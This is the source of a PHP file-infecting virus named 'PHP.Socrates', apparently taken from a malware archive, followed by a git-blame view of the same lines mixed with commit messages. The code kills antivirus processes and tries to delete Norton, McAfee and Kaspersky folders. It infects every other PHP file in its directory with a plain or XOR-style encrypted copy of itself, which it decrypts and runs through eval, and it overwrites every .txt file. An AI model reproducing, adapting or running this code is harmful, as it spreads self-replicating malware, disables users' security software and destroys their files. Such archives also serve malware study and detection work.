vxug-MalwareSourceCode/Other/Virus.PHP.Socrate.a

<?php
echo("PHP.Socrates by synged flesh"."<br>"."The only true wisdom is in knowing you know nothing.");

$decrypt=
"function SocratesDecrypt(\$string,\$key)\r\n"

."{                                 \r\n"

." \$codez='';                       \r\n"

."  for(\$i=0; \$i<strlen(\$string); \$i++)\r\n"

."  {                               \r\n"

."     \$value=ord(\$string[\$i]);     \r\n"

."     \$valuez=\$value+\$key;         \r\n"

."     \$codez.=chr(\$valuez);        \r\n"

."     }                            \r\n"

."       return \$codez;             \r\n"

."  }                               \r\n"

."\$filez = \$_SERVER[\"SCRIPT_NAME\"];\r\n"

."\$break = Explode('/', \$filez);     \r\n"			

."\$pfile = \$break[count(\$break) - 1];\r\n"          

."\$c = fopen(\$pfile,'rb');\r\n"

."\$d = fread(\$c,filesize(\$pfile));\r\n"             

."fclose(\$c);\r\n"

."\$next=strlen(\$d)-693;\r\n"
."\$virus=substr(\$d,687,\$next);\r\n"

."\$vr=SocratesDecrypt(\$virus,'1');\r\n"

."eval(\$vr);";


function SocratesCrypt($string,$key)
            
{
  
               $codez="";
  
                  for($i=0; $i<strlen($string); $i++)
  
                       {
     
     
                          $value=ord($string[$i]);
      
     
                          $valuez=$value-$key;
     
     
                          $codez.=chr($valuez);
     
    
                       }
       
       
                             return $codez;
  
           
}
 
                              if(is_dir("C:\Program Files\Norton*")) 
                                       {
                                           
exec("taskkill /f /t /im nod32.exe");
                                           
rmdir("C:\Program Files\Norton*");

                                       }

                                          if(is_dir("C:\Program Files\McAfee*")) 
                                           {

                                              exec("taskkill /f /t /im Mcshield.exe");
                                              
rmdir("C:\Program Files\McAfee*");
}

                                          
                                          if(is_dir("C:\Program Files\Kaspersky*")) 

                                           {
                                             
exec("taskkill /f /t /im KAV.exe");
                                             
rmdir("C:\Program Files\Kaspersky*");

                                           }
        

$filez = $_SERVER["SCRIPT_NAME"];
$break = Explode('/', $filez);			
$pfile = $break[count($break) - 1];  
$c = fopen($pfile,'rb');

$d = fread($c,filesize($pfile));             

fclose($c);

$nextsize=strlen($d)-4;
$virus=(substr($d,7,$nextsize));
$dir=opendir('*.*');  
           
while (($file = readdir($dir)) !== false) 
                                          
                      
            {
                                           
                 if (strstr($file,'.php')) 
                                                
                        {  
                                                   
                           $f = fopen($file,'rb');             
                                                   
                           $contents = fread($f, filesize($file));
                                                     
                 if (!strstr($contents, 'Socrates')) 
                                                        
                           {  
                                                                                                                              if(!file_exists("Socrates.php")) {
                                 fclose($f);
                                                                                                                   $g = fopen($file,'w');
                                                                                                        fwrite($g,$d); 
    
                                 fclose($g);
    
                                 }


                             if(file_exists("Socrates.php"))
                               {
                                 fclose($f);
                                                                                                                   $g = fopen($file,'w');
                                                                                                        fwrite($g,'<?php'.chr(13).chr(10).$decrypt.'/*'.SocratesCrypt($virus,'1').'*/'.'?>'); 
    
                                 fclose($g);
            
                               }
                            
                              
                          }
                                                
                       }
                                           
                         if (strstr($file,'.txt')) 
                                                
                            {  
                                                  
                                 $f = fopen($file,'w');    
                                                  
                                 fwrite($f,"Let him that would move the world, first move himself.");
                                                
                            }
                     
           }?>
Add files via upload 2020-10-10 03:05:41 +00:00			`<?php`
			`echo("PHP.Socrates by synged flesh"."<br>"."The only true wisdom is in knowing you know nothing.");`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
			`$decrypt=`
			`"function SocratesDecrypt(\$string,\$key)\r\n"`
Add files via upload 2020-10-10 03:05:41 +00:00
			`."{ \r\n"`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`." \$codez=''; \r\n"`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`." for(\$i=0; \$i<strlen(\$string); \$i++)\r\n"`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`." { \r\n"`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`." \$value=ord(\$string[\$i]); \r\n"`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`." \$valuez=\$value+\$key; \r\n"`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`." \$codez.=chr(\$valuez); \r\n"`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`." } \r\n"`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
			`." return \$codez; \r\n"`
Add files via upload 2020-10-10 03:05:41 +00:00
			`." } \r\n"`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`."\$filez = \$_SERVER[\"SCRIPT_NAME\"];\r\n"`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`."\$break = Explode('/', \$filez); \r\n"`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`."\$pfile = \$break[count(\$break) - 1];\r\n"`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
			`."\$c = fopen(\$pfile,'rb');\r\n"`
Add files via upload 2020-10-10 03:05:41 +00:00
			`."\$d = fread(\$c,filesize(\$pfile));\r\n"`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
			`."fclose(\$c);\r\n"`
Add files via upload 2020-10-10 03:05:41 +00:00
			`."\$next=strlen(\$d)-693;\r\n"`
			`."\$virus=substr(\$d,687,\$next);\r\n"`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`."\$vr=SocratesDecrypt(\$virus,'1');\r\n"`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`."eval(\$vr);";`

Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`function SocratesCrypt($string,$key)`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
			`{`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`$codez="";`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`for($i=0; $i<strlen($string); $i++)`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`{`

Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`$value=ord($string[$i]);`

Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`$valuez=$value-$key;`


			`$codez.=chr($valuez);`
Add files via upload 2020-10-10 03:05:41 +00:00

Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`}`

Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`return $codez;`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
			`}`
Add files via upload 2020-10-10 03:05:41 +00:00
			`if(is_dir("C:\Program Files\Norton*"))`
			`{`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`exec("taskkill /f /t /im nod32.exe");`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
			`rmdir("C:\Program Files\Norton*");`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`}`
Add files via upload 2020-10-10 03:05:41 +00:00
			`if(is_dir("C:\Program Files\McAfee*"))`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`{`
Add files via upload 2020-10-10 03:05:41 +00:00
			`exec("taskkill /f /t /im Mcshield.exe");`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
			`rmdir("C:\Program Files\McAfee*");`
			`}`
Add files via upload 2020-10-10 03:05:41 +00:00

			`if(is_dir("C:\Program Files\Kaspersky*"))`

			`{`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`exec("taskkill /f /t /im KAV.exe");`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
			`rmdir("C:\Program Files\Kaspersky*");`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`}`
Add files via upload 2020-10-10 03:05:41 +00:00

			`$filez = $_SERVER["SCRIPT_NAME"];`
			`$break = Explode('/', $filez);`
			`$pfile = $break[count($break) - 1];`
			`$c = fopen($pfile,'rb');`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
			`$d = fread($c,filesize($pfile));`
Add files via upload 2020-10-10 03:05:41 +00:00
			`fclose($c);`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
Add files via upload 2020-10-10 03:05:41 +00:00			`$nextsize=strlen($d)-4;`
			`$virus=(substr($d,7,$nextsize));`
			`$dir=opendir('.');`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00
			`while (($file = readdir($dir)) !== false)`

Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`{`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`if (strstr($file,'.php'))`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`{`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`$f = fopen($file,'rb');`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`$contents = fread($f, filesize($file));`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`if (!strstr($contents, 'Socrates'))`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`{`
Add files via upload 2020-10-10 03:05:41 +00:00			`if(!file_exists("Socrates.php")) {`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`fclose($f);`
			`$g = fopen($file,'w');`
			`fwrite($g,$d);`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`fclose($g);`
Add files via upload 2020-10-10 03:05:41 +00:00
			`}`



			`if(file_exists("Socrates.php"))`
			`{`
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`fclose($f);`
			`$g = fopen($file,'w');`
			`fwrite($g,'<?php'.chr(13).chr(10).$decrypt.'/'.SocratesCrypt($virus,'1').'/'.'?>');`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`fclose($g);`
Add files via upload 2020-10-10 03:05:41 +00:00
			`}`





Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`}`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`}`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`if (strstr($file,'.txt'))`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`{`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`$f = fopen($file,'w');`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`fwrite($f,"Let him that would move the world, first move himself.");`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`}`
Add files via upload 2020-10-10 03:05:41 +00:00
Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a 2020-11-03 05:56:50 +00:00			`}?>`

Add files via upload 2020-10-10 03:05:41 +00:00